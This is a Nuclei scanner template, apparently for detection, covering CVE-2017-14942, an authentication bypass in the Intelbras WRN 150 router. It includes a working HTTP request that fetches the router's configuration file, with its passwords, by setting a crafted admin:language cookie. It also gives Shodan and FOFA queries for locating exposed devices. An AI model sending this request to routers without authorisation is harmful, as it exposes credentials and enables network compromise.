id: CVE-2017-14942 info: name: Intelbras WRN 150 - Authentication Bypass author: ritikchaddha severity: critical description: | Intelbras WRN 150 router is vulnerable to authentication bypass through cookie manipulation. An attacker can bypass authentication and download the router configuration file by manipulating the admin:language cookie. impact: | Attackers can bypass authentication and download the router configuration file containing credentials, network settings, and sensitive information, potentially leading to complete network compromise. remediation: | Update the router firmware to the latest version. reference: - https://www.exploit-db.com/exploits/42916 - https://nvd.nist.gov/vuln/detail/CVE-2017-14942 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-14942 cwe-id: CWE-552 epss-score: 0.01009 epss-percentile: 0.77405 cpe: cpe:2.3:h:intelbras:wrn150:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: intelbras product: wrn150 shodan-query: html:"WRN150" fofa-query: title="WRN150" tags: cve,cve2017,intelbras,auth-bypass,router,vuln http: - raw: - | GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.1 Host: {{Hostname}} Cookie: admin:language=pt matchers: - type: dsl dsl: - "contains(content_type, 'config/conf')" - "contains_all(body, 'wl_', '_passwd')" - "status_code==200" condition: and # digest: 4a0a0047304502205383fe979183abc5329c098b3a699ef15aad6349230200e5a3632ddd0d924a5e022100a8c988b7c59ad03342d7edb345c113d7fd7891868583032e1c7384432a91d0c7:922c64590222798bb761d5b6d8e72950